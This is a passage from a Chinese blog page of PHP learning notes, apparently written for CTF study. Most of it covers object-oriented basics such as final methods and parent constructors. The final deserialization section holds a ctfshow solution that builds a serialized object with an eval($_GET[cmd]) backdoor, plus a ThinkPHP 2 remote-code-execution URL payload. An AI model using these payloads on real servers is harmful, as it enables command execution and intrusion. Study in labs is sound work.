class="hljs-string">&quot;BaseClass::test() called&quot;</span> . PHP_EOL;<br>   &#125;<br>   <br>   <span class="hljs-keyword">final</span> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">moreTesting</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;BaseClass::moreTesting() called&quot;</span>  . PHP_EOL;<br>   &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ChildClass</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">BaseClass</span> </span>&#123;<br>   <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">moreTesting</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ChildClass::moreTesting() called&quot;</span>  . PHP_EOL;<br>   &#125;<br>&#125;<br><span class="hljs-comment">// 报错信息 Fatal error: Cannot override final method BaseClass::moreTesting()</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="调用父类构造方法"><a href="#调用父类构造方法" class="headerlink" title="调用父类构造方法"></a>调用父类构造方法</h2><p>PHP 不会在子类的构造方法中自动的调用父类的构造方法。要执行父类的构造方法，需要在子类的构造方法中调用 <strong>parent::__construct()</strong> 。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">BaseClass</span> </span>&#123;<br>   <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-keyword">print</span> <span class="hljs-string">&quot;BaseClass 类中构造方法&quot;</span> . PHP_EOL;<br>   &#125;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">SubClass</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">BaseClass</span> </span>&#123;<br>   <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-built_in">parent</span>::<span class="hljs-title function_ invoke__">__construct</span>();  <span class="hljs-comment">// 子类构造方法不能自动调用父类的构造方法</span><br>       <span class="hljs-keyword">print</span> <span class="hljs-string">&quot;SubClass 类中构造方法&quot;</span> . PHP_EOL;<br>   &#125;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">OtherSubClass</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">BaseClass</span> </span>&#123;<br>    <span class="hljs-comment">// 继承 BaseClass 的构造方法</span><br>&#125;<br><br><span class="hljs-comment">// 调用 BaseClass 构造方法</span><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">BaseClass</span>();<br><br><span class="hljs-comment">// 调用 BaseClass、SubClass 构造方法</span><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SubClass</span>();<br><br><span class="hljs-comment">// 调用 BaseClass 构造方法</span><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">OtherSubClass</span>();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>执行以上程序，输出结果为：</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-keyword">BaseClass </span>类中构造方法<br><span class="hljs-keyword">BaseClass </span>类中构造方法<br><span class="hljs-keyword">SubClass </span>类中构造方法<br><span class="hljs-keyword">BaseClass </span>类中构造方法<br></code></pre></td></tr></table></figure>

<h1 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h1><p>ctfshow例题：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs txt">&lt;?php<br>class ctfShowUser&#123;<br>    private $username=&#x27;xxxxxx&#x27;;<br>    private $password=&#x27;xxxxxx&#x27;;<br>    private $isVip=false;<br>    private $class = &#x27;info&#x27;;<br><br>    public function __construct()&#123;<br>        $this-&gt;class=new backDoor();//修改为backdoor方法<br>    &#125;<br>    public function login($u,$p)&#123;<br>        return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br>    &#125;<br>    public function __destruct()&#123;<br>        $this-&gt;class-&gt;getInfo();<br>    &#125;<br><br>&#125;<br><br>class info&#123;<br>    private $user=&#x27;xxxxxx&#x27;;<br>    public function getInfo()&#123;<br>        return $this-&gt;user;<br>    &#125;<br>&#125;<br><br>class backDoor&#123;<br>    private $code=&#x27;eval($_GET[cmd]);&#x27;;//修改为cmd<br>    public function getInfo()&#123;<br>        eval($this-&gt;code);<br>    &#125;<br>&#125;<br>$user=new ctfShowUser();<br>echo urlencode(serialize($user));//复制显示的内容并粘贴至例题cookie新建user的value处<br>?&gt;<br>//在例题处给username和password赋值并执行cmd的命令<br></code></pre></td></tr></table></figure>

<p>php2 think ice：<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_37638874/article/details/126749104">https://blog.csdn.net/m0_37638874/article/details/126749104</a></p>
<p>搭建环境<img    class="lazyload" data-original="https://raw.githubusercontent.com/20231201/123/main/image-20240221193658260.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">搭建环境</span></p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs txt">http://192.168.85.129:8080/index.php?s=/a/b/c/$&#123;@print(system($_POST[a]))&#125;<br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://raw.githubusercontent.com/20231201/123/main/image-20240221193608849.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">运行结果</span></p>

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>John Doe</li>
    <li><strong>本文链接：</strong><a href="http://example.com/2024/02/21/php/index.html" title="http:&#x2F;&#x2F;example.com&#x2F;2024&#x2F;02&#x2F;21&#x2F;php&#x2F;index.html">http:&#x2F;&#x2F;example.com&#x2F;2024&#x2F;02&#x2F;21&#x2F;php&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
          <section class="donate">
  <div id="qrcode-donate">
    <img   class="lazyload" data-original="https://pic.izhaoo.com/alipay.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >
  </div>
  <div class="icon">
    <a href="javascript:;" id="alipay"><i class="iconfont iconalipay"></i></a>
    <a href="javascript:;" id="wechat"><i class="iconfont iconwechat-fill"></i></a>
  </div>
</section>
        
        
        
  <nav class="nav">
    <a href="/2024/02/21/csrf,ssrf,redis/"><i class="iconfont iconleft"></i></a>
    <a href="/2024/01/25/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#title-php"><span class="toc-text">title:php</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#php%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1"><span class="toc-text">php面向对象</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E5%86%85%E5%AE%B9"><span class="toc-text">面向对象内容</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-%E7%B1%BB%E5%AE%9A%E4%B9%89"><span class="toc-text">PHP 类定义</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-%E4%B8%AD%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1"><span class="toc-text">PHP 中创建对象</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E6%88%90%E5%91%98%E6%96%B9%E6%B3%95"><span class="toc-text">调用成员方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-1"><span class="toc-text">实例</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0"><span class="toc-text">PHP 构造函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-2"><span class="toc-text">实例</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0"><span class="toc-text">析构函数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-3"><span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%A7%E6%89%BF"><span class="toc-text">继承</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-4"><span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E9%87%8D%E5%86%99"><span class="toc-text">方法重写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6"><span class="toc-text">访问控制</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B1%9E%E6%80%A7%E7%9A%84%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6"><span class="toc-text">属性的访问控制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E7%9A%84%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6"><span class="toc-text">方法的访问控制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A5%E5%8F%A3"><span class="toc-text">接口</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E9%87%8F"><span class="toc-text">常量</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-5"><span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%BD%E8%B1%A1%E7%B1%BB"><span class="toc-text">抽象类</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Static-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-text">Static 关键字</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Final-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-text">Final 关键字</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E7%88%B6%E7%B1%BB%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95"><span class="toc-text">调用父类构造方法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-text">反序列化</span></a>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=894519210 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://github.com/zhaoo "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:izhaoo@163.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
</body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>





  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>












</html>